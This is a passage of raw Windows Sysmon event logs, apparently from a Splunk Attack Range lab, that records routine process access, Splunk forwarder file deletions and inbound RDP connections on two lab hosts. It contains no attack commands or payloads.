09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979587Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979586Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979585Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979584Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979583Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979582Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979581Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979580Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979579Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8BB0-6151-E079-00000000FD01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979578Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BB0-6151-E079-00000000FD01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979577Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.200{69CF5F33-8BB0-6151-E079-00000000FD01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979576Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.153{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DE1DDDD0D65DF023D1416DF27928CB6,SHA256=1F9B1DE6F2189456BC52D0C6A4F0F360F08C5F09E14ED7D364C6A3A6A849EA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979575Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.059{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18063D4D15DAE18B189F25D5AA5E8992,SHA256=2F3D3E7E93A422A218DFC58B05639593494E14B1451C3C7075B96B71F0BD8E8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:29.501{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A16E0801960600CD61A6542750C742B1,SHA256=D53096ADD9D3BD017FF8A7BCF398122924B6F60E0530B76A543ED409EC1EE91F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979606Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:29.371{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B16530D4826FC5722122576DBEDD8AE,SHA256=80A55320FE377E32DA755A036A71A1DA69D0C7A7C896F82EA57ACE42154C9688,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979605Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.700{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59428-false10.0.1.12-8000- 23542300x8000000000000000979604Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:29.356{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60D8E100DCD254D191D5B0648A97065A,SHA256=0AC9A43C1A21AECE492A12BB635F089F31B7BC1B99B3AA9A9C4BB20A0E1D10F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979603Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:29.059{69CF5F33-8BB0-6151-E179-00000000FD01}9361232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:30.518{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D4445C5F56BE9E7330DAC7D015CD71A,SHA256=A15421374F9AC14EB7C4F180DBDE16560417FB7EF0792093973AFEC5DDB74634,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979607Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:30.387{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEBA9FEEEE946CAAD95F757FF0F49538,SHA256=7E9F1E7A53B9597DDB12AB63D60FB7D73EDEE0369142172C8909B59E6F0E9EE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:30.019{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34D569EF917A093ED6C54DB43DD63203,SHA256=69B68C5AFD71A572842C50158846B46598C9EAD2F3C0950169E79C3B81134DC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:28.158{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55826-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:31.548{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94AFECF8D4C6C020F7B5FEF62236F3EF,SHA256=C39A9C7BCD72144160E9A1CAB328ED537F23F86487B050B8EF5965BB7C8563F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979611Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:31.606{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A89A2517C8C0C948ACD1BC03561D522,SHA256=C42B707BC6C6447D7E71CFD073948EAE9215A03A0E653476EF1FDCEAE7DF0E44,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:31.233{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:31.233{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:31.233{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000979610Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.327{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de49991-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979609Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.872{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56370-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979608Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:31.199{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C722B6B4D627E1D08A5F5013138FEE7B,SHA256=1B4234B2BDC1A297B104A06098B142902C8BF6D8BD7A42859E692CF55F0BFBED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:32.582{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:32.581{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=162CA8223B675F6D0590FD6950BBB84A,SHA256=2C9D2829777438A9C6C39EF812B0BF0933A42D5A101E79B3AA604F33560CAC40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:32.564{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB95E2E912A65B63485F40CD62899834,SHA256=421A36F0C904EC13BD6E085A2F346AF19973C0E6994BDCEAE905D85F9499463D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979613Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:32.762{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C526361DA9045BCFBEBB80DD8C23F43,SHA256=F9614F102DDA47354FA4348BCAE4136FCCC101FA9DEFD9BBA464FDF55C3689D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979612Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:32.559{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B5306797887C187779901DEFD7B0F2D1,SHA256=4544B9517CDEED35DE1B80548ABFE528959388B1CA44C09EC169F4D25ED93877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979615Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:33.762{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 